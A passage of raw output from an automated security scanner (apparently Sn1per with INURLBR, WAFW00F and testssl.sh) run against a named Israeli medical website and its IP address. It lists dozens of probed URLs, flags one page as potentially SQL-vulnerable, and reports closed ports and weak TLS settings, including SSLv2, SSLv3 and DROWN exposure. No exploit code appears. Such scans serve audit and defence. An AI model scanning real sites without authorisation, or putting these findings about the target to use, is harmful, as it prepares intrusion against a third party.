  4939. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/about/drarik/ ]
  4940. |_[ + ] Exploit:: 
  4941. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  4942. |_[ + ] More details::  / - / , ISP: 
  4943. |_[ + ] Found:: UNIDENTIFIED
  4944. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 13229 out of 14705 bytes received
  4945. 
  4946.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4947. |_[ + ] [ 24 / 63 ]-[23:35:34] [ - ] 
  4948. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/adult/stabbing/ ]
  4949. |_[ + ] Exploit:: 
  4950. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  4951. |_[ + ] More details::  / - / , ISP: 
  4952. |_[ + ] Found:: UNIDENTIFIED
  4953. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 6489 out of 16732 bytes received
  4954. 
  4955.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4956. |_[ + ] [ 25 / 63 ]-[23:35:41] [ - ] 
  4957. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/child/technologylinks/ ]
  4958. |_[ + ] Exploit:: 
  4959. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  4960. |_[ + ] More details::  / - / , ISP: 
  4961. |_[ + ] Found:: UNIDENTIFIED
  4962. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 22665 out of 53619 bytes received
  4963. 
  4964.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4965. |_[ + ] [ 26 / 63 ]-[23:35:48] [ - ] 
  4966. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/child/bmichild/ ]
  4967. |_[ + ] Exploit:: 
  4968. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  4969. |_[ + ] More details::  / - / , ISP: 
  4970. |_[ + ] Found:: UNIDENTIFIED
  4971. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 7837 out of 15353 bytes received
  4972. 
  4973.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4974. |_[ + ] [ 27 / 63 ]-[23:35:57] [ - ] 
  4975. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/adult/adultlinks/ ]
  4976. |_[ + ] Exploit:: 
  4977. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  4978. |_[ + ] More details::  / - / , ISP: 
  4979. |_[ + ] Found:: UNIDENTIFIED
  4980. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 19969 out of 93853 bytes received
  4981. 
  4982.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4983. |_[ + ] [ 28 / 63 ]-[23:36:03] [ - ] 
  4984. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/child/pharmalinks/ ]
  4985. |_[ + ] Exploit:: 
  4986. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  4987. |_[ + ] More details::  / - / , ISP: 
  4988. |_[ + ] Found:: UNIDENTIFIED
  4989. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 10533 out of 53331 bytes received
  4990. 
  4991.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  4992. |_[ + ] [ 29 / 63 ]-[23:36:08] [ - ] 
  4993. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/about/rebaka/ ]
  4994. |_[ + ] Exploit:: 
  4995. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  4996. |_[ + ] More details::  / - / , ISP: 
  4997. |_[ + ] Found:: UNIDENTIFIED
  4998. 
  4999.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  5000. |_[ + ] [ 30 / 63 ]-[23:36:13] [ - ] 
  5001. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/thetencommandments/terms/ ]
  5002. |_[ + ] Exploit:: 
  5003. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  5004. |_[ + ] More details::  / - / , ISP: 
  5005. |_[ + ] Found:: UNIDENTIFIED
  5006. 
  5007.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  5008. |_[ + ] [ 31 / 63 ]-[23:36:20] [ - ] 
  5009. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/child/childlinks/ ]
  5010. |_[ + ] Exploit:: 
  5011. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  5012. |_[ + ] More details::  / - / , ISP: 
  5013. |_[ + ] Found:: UNIDENTIFIED
  5014. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 7837 out of 15340 bytes received
  5015. 
  5016.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  5017. |_[ + ] [ 32 / 63 ]-[23:36:25] [ - ] 
  5018. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/child/childcustomers/ ]
  5019. |_[ + ] Exploit:: 
  5020. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  5021. |_[ + ] More details::  / - / , ISP: 
  5022. |_[ + ] Found:: UNIDENTIFIED
  5023. 
  5024.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  5025. |_[ + ] [ 33 / 63 ]-[23:36:29] [ ! ] 
  5026. |_[ + ] Target:: [ ( POTENTIALLY VULNERABLE )  http://www.doctorarik.co.il/20170629102001-nyv-472.html ]
  5027. |_[ + ] Exploit:: 
  5028. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  5029. |_[ + ] More details::  / - / , ISP: 
  5030. |_[ + ] Found::  POSTGRESQL-06 - VALUE: pg_
  5031. |_[ + ] VALUE SAVED IN THE FILE:: inurlbr-doctorarik.co.il.txt
  5032. 
  5033.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  5034. |_[ + ] [ 34 / 63 ]-[23:36:37] [ - ] 
  5035. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/adult/adult-articles/ ]
  5036. |_[ + ] Exploit:: 
  5037. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  5038. |_[ + ] More details::  / - / , ISP: 
  5039. |_[ + ] Found:: UNIDENTIFIED
  5040. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 15925 out of 20385 bytes received
  5041. 
  5042.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  5043. |_[ + ] [ 35 / 63 ]-[23:36:43] [ - ] 
  5044. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/adult/adults-recipes/ ]
  5045. |_[ + ] Exploit:: 
  5046. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  5047. |_[ + ] More details::  / - / , ISP: 
  5048. |_[ + ] Found:: UNIDENTIFIED
  5049. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 14577 out of 20851 bytes received
  5050. 
  5051.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  5052. |_[ + ] [ 36 / 63 ]-[23:36:52] [ - ] 
  5053. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/adult/the-right-diet/ ]
  5054. |_[ + ] Exploit:: 
  5055. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  5056. |_[ + ] More details::  / - / , ISP: 
  5057. |_[ + ] Found:: UNIDENTIFIED
  5058. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 10533 out of 26817 bytes received
  5059. 
  5060.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  5061. |_[ + ] [ 37 / 63 ]-[23:36:58] [ - ] 
  5062. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/child/mobile-links/ ]
  5063. |_[ + ] Exploit:: 
  5064. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  5065. |_[ + ] More details::  / - / , ISP: 
  5066. |_[ + ] Found:: UNIDENTIFIED
  5067. 
  5068.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  5069. |_[ + ] [ 38 / 63 ]-[23:37:04] [ - ] 
  5070. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/adult-articles/breakfastimportant/510/ ]
  5071. |_[ + ] Exploit:: 
  5072. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  5073. |_[ + ] More details::  / - / , ISP: 
  5074. |_[ + ] Found:: UNIDENTIFIED
  5075. 
  5076.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  5077. |_[ + ] [ 39 / 63 ]-[23:37:09] [ - ] 
  5078. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/adult/sport-for-diet/ ]
  5079. |_[ + ] Exploit:: 
  5080. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  5081. |_[ + ] More details::  / - / , ISP: 
  5082. |_[ + ] Found:: UNIDENTIFIED
  5083. 
  5084.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  5085. |_[ + ] [ 40 / 63 ]-[23:37:15] [ - ] 
  5086. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/adult-articles/healtheatright/588/ ]
  5087. |_[ + ] Exploit:: 
  5088. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  5089. |_[ + ] More details::  / - / , ISP: 
  5090. |_[ + ] Found:: UNIDENTIFIED
  5091. 
  5092.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  5093. |_[ + ] [ 41 / 63 ]-[23:37:19] [ - ] 
  5094. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/adult-articles/justcloths/208/ ]
  5095. |_[ + ] Exploit:: 
  5096. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  5097. |_[ + ] More details::  / - / , ISP: 
  5098. |_[ + ] Found:: UNIDENTIFIED
  5099. 
  5100.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  5101. |_[ + ] [ 42 / 63 ]-[23:37:26] [ - ] 
  5102. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/adult-articles/hardonwinter/214/ ]
  5103. |_[ + ] Exploit:: 
  5104. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  5105. |_[ + ] More details::  / - / , ISP: 
  5106. |_[ + ] Found:: UNIDENTIFIED
  5107. 
  5108.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  5109. |_[ + ] [ 43 / 63 ]-[23:37:29] [ - ] 
  5110. |_[ + ] Target:: [ http://www.doctorarik.co.il/wp-login.php?action=lostpassword ]
  5111. |_[ + ] Exploit:: 
  5112. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  5113. |_[ + ] More details::  / - / , ISP: 
  5114. |_[ + ] Found:: UNIDENTIFIED
  5115. 
  5116.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  5117. |_[ + ] [ 44 / 63 ]-[23:37:35] [ - ] 
  5118. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/adult-articles/adult-article2/150/ ]
  5119. |_[ + ] Exploit:: 
  5120. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  5121. |_[ + ] More details::  / - / , ISP: 
  5122. |_[ + ] Found:: UNIDENTIFIED
  5123. 
  5124.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  5125. |_[ + ] [ 45 / 63 ]-[23:37:42] [ - ] 
  5126. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/adults-recipes/recipe-3/289/ ]
  5127. |_[ + ] Exploit:: 
  5128. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  5129. |_[ + ] More details::  / - / , ISP: 
  5130. |_[ + ] Found:: UNIDENTIFIED
  5131. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 9185 out of 15884 bytes received
  5132. 
  5133.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  5134. |_[ + ] [ 46 / 63 ]-[23:37:49] [ - ] 
  5135. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/kids-recipes/kids_recipe-10/334/ ]
  5136. |_[ + ] Exploit:: 
  5137. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  5138. |_[ + ] More details::  / - / , ISP: 
  5139. |_[ + ] Found:: UNIDENTIFIED
  5140. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 6489 out of 15976 bytes received
  5141. 
  5142.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  5143. |_[ + ] [ 47 / 63 ]-[23:37:56] [ - ] 
  5144. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/adults-recipes/recipe-6/298/ ]
  5145. |_[ + ] Exploit:: 
  5146. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  5147. |_[ + ] More details::  / - / , ISP: 
  5148. |_[ + ] Found:: UNIDENTIFIED
  5149. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 6489 out of 16015 bytes received
  5150. 
  5151.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  5152. |_[ + ] [ 48 / 63 ]-[23:38:02] [ - ] 
  5153. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/adults-recipes/recipe-2/218/ ]
  5154. |_[ + ] Exploit:: 
  5155. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  5156. |_[ + ] More details::  / - / , ISP: 
  5157. |_[ + ] Found:: UNIDENTIFIED
  5158. 
  5159.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  5160. |_[ + ] [ 49 / 63 ]-[23:38:07] [ - ] 
  5161. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/kids-recipes/kids_recipe-8/330/ ]
  5162. |_[ + ] Exploit:: 
  5163. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  5164. |_[ + ] More details::  / - / , ISP: 
  5165. |_[ + ] Found:: UNIDENTIFIED
  5166. 
  5167.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  5168. |_[ + ] [ 50 / 63 ]-[23:38:14] [ - ] 
  5169. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/kids-recipes/kids_recipe-7/328/ ]
  5170. |_[ + ] Exploit:: 
  5171. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  5172. |_[ + ] More details::  / - / , ISP: 
  5173. |_[ + ] Found:: UNIDENTIFIED
  5174. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 13229 out of 15375 bytes received
  5175. 
  5176.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  5177. |_[ + ] [ 51 / 63 ]-[23:38:21] [ - ] 
  5178. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/adult-articles/adult-article1/145/ ]
  5179. |_[ + ] Exploit:: 
  5180. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  5181. |_[ + ] More details::  / - / , ISP: 
  5182. |_[ + ] Found:: UNIDENTIFIED
  5183. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 10533 out of 16848 bytes received
  5184. 
  5185.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  5186. |_[ + ] [ 52 / 63 ]-[23:38:25] [ - ] 
  5187. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/adults-recipes/recipe-5/296/ ]
  5188. |_[ + ] Exploit:: 
  5189. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  5190. |_[ + ] More details::  / - / , ISP: 
  5191. |_[ + ] Found:: UNIDENTIFIED
  5192. 
  5193.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  5194. |_[ + ] [ 53 / 63 ]-[23:38:29] [ - ] 
  5195. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/adults-recipes/recipe-7/300/ ]
  5196. |_[ + ] Exploit:: 
  5197. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  5198. |_[ + ] More details::  / - / , ISP: 
  5199. |_[ + ] Found:: UNIDENTIFIED
  5200. 
  5201.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  5202. |_[ + ] [ 54 / 63 ]-[23:38:32] [ - ] 
  5203. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/adults-recipes/recipe-10/307/ ]
  5204. |_[ + ] Exploit:: 
  5205. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  5206. |_[ + ] More details::  / - / , ISP: 
  5207. |_[ + ] Found:: UNIDENTIFIED
  5208. 
  5209.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  5210. |_[ + ] [ 55 / 63 ]-[23:38:36] [ - ] 
  5211. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/adults-recipes/recipe-9/305/ ]
  5212. |_[ + ] Exploit:: 
  5213. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  5214. |_[ + ] More details::  / - / , ISP: 
  5215. |_[ + ] Found:: UNIDENTIFIED
  5216. 
  5217.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  5218. |_[ + ] [ 56 / 63 ]-[23:38:40] [ - ] 
  5219. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/kids-recipes/kids_recipe-5/324/ ]
  5220. |_[ + ] Exploit:: 
  5221. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  5222. |_[ + ] More details::  / - / , ISP: 
  5223. |_[ + ] Found:: UNIDENTIFIED
  5224. 
  5225.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  5226. |_[ + ] [ 57 / 63 ]-[23:38:43] [ - ] 
  5227. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/adults-recipes/recipe-4/292/ ]
  5228. |_[ + ] Exploit:: 
  5229. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  5230. |_[ + ] More details::  / - / , ISP: 
  5231. |_[ + ] Found:: UNIDENTIFIED
  5232. 
  5233.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  5234. |_[ + ] [ 58 / 63 ]-[23:38:47] [ - ] 
  5235. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/adults-recipes/recipe-11/309/ ]
  5236. |_[ + ] Exploit:: 
  5237. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  5238. |_[ + ] More details::  / - / , ISP: 
  5239. |_[ + ] Found:: UNIDENTIFIED
  5240. 
  5241.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  5242. |_[ + ] [ 59 / 63 ]-[23:38:51] [ - ] 
  5243. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/kids-recipes/kids_recipe-11/336/ ]
  5244. |_[ + ] Exploit:: 
  5245. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  5246. |_[ + ] More details::  / - / , ISP: 
  5247. |_[ + ] Found:: UNIDENTIFIED
  5248. 
  5249.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  5250. |_[ + ] [ 60 / 63 ]-[23:38:54] [ - ] 
  5251. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/kids-recipes/kids_recipe-2/314/ ]
  5252. |_[ + ] Exploit:: 
  5253. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  5254. |_[ + ] More details::  / - / , ISP: 
  5255. |_[ + ] Found:: UNIDENTIFIED
  5256. 
  5257.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  5258. |_[ + ] [ 61 / 63 ]-[23:38:58] [ - ] 
  5259. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/adults-recipes/recipe-8/303/ ]
  5260. |_[ + ] Exploit:: 
  5261. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  5262. |_[ + ] More details::  / - / , ISP: 
  5263. |_[ + ] Found:: UNIDENTIFIED
  5264. 
  5265.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  5266. |_[ + ] [ 62 / 63 ]-[23:39:02] [ - ] 
  5267. |_[ + ] Target:: [ http://www.doctorarik.co.il/index.php/kids-recipes/kids_recipe-3/316/ ]
  5268. |_[ + ] Exploit:: 
  5269. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET, IP:62.219.91.10:80 
  5270. |_[ + ] More details::  / - / , ISP: 
  5271. |_[ + ] Found:: UNIDENTIFIED
  5272.  
  5273. [ INFO ] [ Shutting down ]
  5274. [ INFO ] [ End of process INURLBR at [30-12-2017 23:39:02]
  5275. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 1 ]
  5276. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-doctorarik.co.il.txt ]
  5277. |_________________________________________________________________________________________
  5278. http://www.doctorarik.co.il/20170629102001-nyv-472.html
  5279.  
  5280. \_________________________________________________________________________________________/
  5281.  
  5282.  + -- --=[Port 110 closed... skipping.
  5283.  + -- --=[Port 111 closed... skipping.
  5284.  + -- --=[Port 135 closed... skipping.
  5285.  + -- --=[Port 139 closed... skipping.
  5286.  + -- --=[Port 161 closed... skipping.
  5287.  + -- --=[Port 162 closed... skipping.
  5288.  + -- --=[Port 389 closed... skipping.
  5289.  + -- --=[Port 443 opened... running tests...
  5290.  + -- ----------------------------=[Checking for WAF]=------------------------ -- +
  5291.  
  5292. ^ ^
  5293. _ __ _ ____ _ __ _ _ ____
  5294. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  5295. | V V // o // _/ | V V // 0 // 0 // _/
  5296. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  5297. <
  5298. ...'
  5299.  
  5300. WAFW00F - Web Application Firewall Detection Tool
  5301.  
  5302. By Sandro Gauci && Wendel G. Henrique
  5303.  
  5304. Checking https://doctorarik.co.il
  5305.  
  5306.  + -- ----------------------------=[Checking Cloudflare]=--------------------- -- +
  5307.  + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
  5308. https://doctorarik.co.il [404 Not Found] Country[ISRAEL][IL], HTTPServer[Microsoft-HTTPAPI/2.0], IP[62.219.91.10], Microsoft-HTTPAPI[2.0], Title[Not Found]
  5309.  
  5310.  + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +
  5311. Version: 1.11.10-static
  5312. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  5313. 
  5314. Testing SSL server doctorarik.co.il on port 443 using SNI name doctorarik.co.il
  5315.  
  5316. TLS Fallback SCSV:
  5317. Server does not support TLS Fallback SCSV
  5318.  
  5319. TLS renegotiation:
  5320. Secure session renegotiation supported
  5321.  
  5322. TLS Compression:
  5323. Compression disabled
  5324.  
  5325. Heartbleed:
  5326. TLS 1.2 not vulnerable to heartbleed
  5327. TLS 1.1 not vulnerable to heartbleed
  5328. TLS 1.0 not vulnerable to heartbleed
  5329.  
  5330. Supported Server Cipher(s):
  5331. Preferred TLSv1.0 128 bits AES128-SHA
  5332. Accepted TLSv1.0 256 bits AES256-SHA
  5333. Accepted TLSv1.0 128 bits RC4-SHA 
  5334. Accepted TLSv1.0 112 bits DES-CBC3-SHA 
  5335. Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  5336. Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  5337. Accepted TLSv1.0 128 bits RC4-MD5 
  5338. Preferred SSLv3 128 bits RC4-SHA 
  5339. Accepted SSLv3 112 bits DES-CBC3-SHA 
  5340. Accepted SSLv3 128 bits RC4-MD5 
  5341. Preferred SSLv2 128 bits RC4-MD5 
  5342. Accepted SSLv2 112 bits DES-CBC3-MD5 
  5343.  
  5344. SSL Certificate:
  5345. Signature Algorithm: sha256WithRSAEncryption
  5346. RSA Key Strength: 2048
  5347.  
  5348. Subject: negba.dtnt.info
  5349. Altnames: DNS:negba.dtnt.info
  5350. Issuer: thawte DV SSL CA - G2
  5351.  
  5352. Not valid before: Feb 5 00:00:00 2017 GMT
  5353. Not valid after: Mar 7 23:59:59 2018 GMT
  5354. 
  5355. ###########################################################
  5356. testssl 2.9dev from https://testssl.sh/dev/
  5357. 
  5358. This program is free software. Distribution and
  5359. modification under GPLv2 permitted.
  5360. USAGE w/o ANY WARRANTY. USE IT AT YOUR OWN RISK!
  5361.  
  5362. Please file bugs @ https://testssl.sh/bugs/
  5363. 
  5364. ###########################################################
  5365.  
  5366. Using "OpenSSL 1.0.2-chacha (1.0.2i-dev)" [~183 ciphers]
  5367. on Kali:/usr/share/sniper/plugins/testssl.sh/bin/openssl.Linux.x86_64
  5368. (built: "Jun 22 19:32:29 2016", platform: "linux-x86_64")
  5369.  
  5370.  
  5371.  Start 2017-12-30 23:40:22 -->> 62.219.91.10:443 (doctorarik.co.il) <<--
  5372.  
  5373. rDNS (62.219.91.10): cust-62-219-91-10.cust.bezeqint.net.
  5374. Service detected: Couldn't determine what's running on port 443, assuming no HTTP service => skipping all HTTP checks
  5375.  
  5376.  
  5377.  Testing protocols via sockets except SPDY+HTTP2 
  5378.  
  5379.  SSLv2 offered (NOT ok), also VULNERABLE to DROWN attack -- 2 ciphers
  5380.  SSLv3 offered (NOT ok)
  5381.  TLS 1 offered
  5382.  TLS 1.1 not offered
  5383.  TLS 1.2 not offered -- strange, server closed TCP connection 
  5384.  TLS 1.3 not offered
  5385.  SPDY/NPN not offered
  5386.  HTTP2/ALPN not offered
  5387.  
  5388.  Testing ~standard cipher categories 
  5389.  
  5390.  NULL ciphers (no encryption) not offered (OK)
  5391.  Anonymous NULL Ciphers (no authentication) not offered (OK)
  5392.  Export ciphers (w/o ADH+NULL) not offered (OK)
  5393.  LOW: 64 Bit + DES encryption (w/o export) not offered (OK)
  5394.  Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) offered (NOT ok)
  5395.  Triple DES Ciphers (Medium) offered
  5396.  High encryption (AES+Camellia, no AEAD) offered (OK)
  5397.  Strong encryption (AEAD ciphers) not offered
  5398.  
  5399.  
  5400.  Testing robust (perfect) forward secrecy, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4 
  5401.  
  5402.  PFS is offered (OK) ECDHE-RSA-AES256-SHA ECDHE-RSA-AES128-SHA
  5403.  Elliptic curves offered: prime256v1 secp384r1
  5404.  
  5405.  
  5406.  Testing server preferences 
  5407.  
  5408.  Has server cipher order? yes (OK)
  5409.  Negotiated protocol TLSv1
  5410.  Negotiated cipher AES128-SHA
  5411.  Cipher order
  5412. SSLv3: RC4-SHA DES-CBC3-SHA RC4-MD5
  5413. TLSv1: AES128-SHA AES256-SHA RC4-SHA DES-CBC3-SHA ECDHE-RSA-AES128-SHA
  5414. ECDHE-RSA-AES256-SHA RC4-MD5
  5415.  
  5416.  
  5417.  Testing server defaults (Server Hello) 
  5418.  
